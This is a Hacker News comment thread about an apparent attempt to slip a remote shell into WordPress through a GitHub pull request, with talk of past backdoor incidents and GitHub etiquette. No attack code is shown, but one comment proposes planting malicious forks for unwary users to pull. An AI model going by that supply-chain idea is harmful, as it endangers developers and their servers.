
Attempt to hack WordPress with a pull request - alpb
https://github.com/wordpress/wordpress/pull/18
======
ck2
WP has absolutely no room to be making fun of security issues.

They caught this one because it was an obvious attempt, but their track
history sucks.

Mocking evil hackers is a very stupid idea.

Oh and I believe they tried this because someone was successful in the past if
I remember correctly.

~~~
scribu
> Mocking evil hackers is a very stupid idea.

So, every script kiddie is an "evil hacker" now?

> Oh and I believe they tried this because someone was successful in the past
> if I remember correctly.

Source?

~~~
ck2
At least one incident here, my memory is clouded by all the issues over the
years:

[http://it.slashdot.org/story/11/06/22/1241241/wordpressorg-h...](http://it.slashdot.org/story/11/06/22/1241241/wordpressorg-
hacked-plugin-repository-compromised)

~~~
scribu
Thanks for the link, but inserting commits by hacking the infrastructure isn't
quite the same as having a pull request officially merged.

Even the Linux infrastructure was hacked not too long ago. More such example
here: <https://news.ycombinator.com/item?id=4464303>

------
kevinconroy
Nothing subtle, but he was clever in the sense that he managed to stuff a
complete injection attack into his single file and included a Google-call in
case his script didn't recognize the operating system.

Worth a read not because it's a genius-level hack, but worth to see the
breadth-first attempt that the attack takes to utilize a number of strategies.
Realizing the number of attack vectors that you have to defend against is key
to writing secure code.

In that sense, I wonder if there are other good examples of attack code hosted
on github somewhere. Seems like there's as much to learn from "black hat" code
attacks as there is from doing code reviews on your own codebase.

~~~
TazeTSchnitzel
It's cool and all, but I get the feeling that the pull requester probably
didn't write the code.

------
zoul
Sweet Jesus the discussion under the request looks like MySpace. I sincerely
hope that this isn't going to be the norm on GitHub in the future.

~~~
callahad
It's already pretty common on any issue or pull request that gets a lot of
attention and has an aspect of community drama. The Crockford / semicolon one
isn't _as_ bad straight out of the gate
(<https://github.com/twitter/bootstrap/issues/3057>), but still...

~~~
pooriaazimi
That thread's been modified _heavily_ since then. And I mean heavily. The
first 300 posts were all memes back then.

------
DigitalSea
Very clever but given Wordpress's security track record when it comes to code
exploits I wouldn't have been surprised if this somehow made its way into the
core. Good code for learning how some particular Wordpress exploits work.

~~~
pervycreeper
Are you saying that someone who hasn't read the complete source code of all
the software he uses is a moron?

~~~
pervycreeper
Oops, meant to reply to <http://news.ycombinator.com/item?id=4464955>

------
nyodeneD
Are there any examples of hackers successfully inserting exploits into a
popular codebase like this?

~~~
nl
There was the famous attempt to insert a backdoor in the Linux sourcetree[1].
That wasn't quite the same as it wasn't a pull request (or equivalent), was
instead done by directly modifying the CVS mirror of the BitKeeper sourcetree.

[1]
[http://lkml.indiana.edu/hypermail/linux/kernel/0311.0/0621.h...](http://lkml.indiana.edu/hypermail/linux/kernel/0311.0/0621.html)

------
tjdetwiler
I was expecting something subtle and clever.

------
cheap
Instead of focusing on the pull request maybe we should think about better
vulnerability trajectories. Next time don't make a pull request. Just fork the
project, add some dumb feature someone will want or need, then leave your fork
out there on Github. Morons will pull it down and use it without ever checking
the code.

------
ohashi
So he just put in a remote shell and removed the actual code? I've found a
couple remote shell scripts on my server over the years as they got
compromised, I was always impressed with how much they could really do from 1
file to my server. Scary stuff.

------
adrinavarro
<https://github.com/maxymax> I'm quite intrigued by his profile. Note the
'10,000 commits with 255,815 additions and 29,562 deletions'.

~~~
alpb
Oh God how could possibly do 10,000 commits on a single file?

~~~
duskwuff
Not sure, but possibly by attempting to insert a malicious commit into the
history and rebase everything else over it.

~~~
Shank
That would be this pull request he sent:

<https://github.com/WordPress/WordPress/pull/19>

------
ibotty
the pull-request seems to be deleted. for people that want to have a look at
the (partly not yet obfuscated) commit will want to search for the sha

2fa93590c7881fab043be7b8b51358894dbc1466

------
keithburgun
Could someone explain this joke to me, a total programming noob?

~~~
TazeTSchnitzel
They made a pull request - which basically means a request to change the
source code - to insert a huge hacker console into wp.

~~~
kghose
Thanks. I'm with parent and very curious about what this is about. Does this
console give root access to the server via a web interface?

~~~
OtisBoxcar
Sort of. It gives access with whatever user the webserver is running under.
Might be root, but will usually be a less privileged user eg www-data.

------
newobj
Laugh now, but someone will pull it off one day.

------
Gamefoo
"An hilarious", really? Dude, spend a minute on your title. It's not Reddit
here.

~~~
jameyc
That's actually correct - 'an' before a sounded 'h' is a style issue in
American English, and still commonly used. In nearly every other English
dialect it is a strict rule.

~~~
ajhit406
Yeah I was just going to comment on this too-- "a" vs. "an" actually has to do
with pronunciation, not strictly words that begin with vowels.

Maybe the author is Irish =)

------
homakov
i'm envy. smart hack

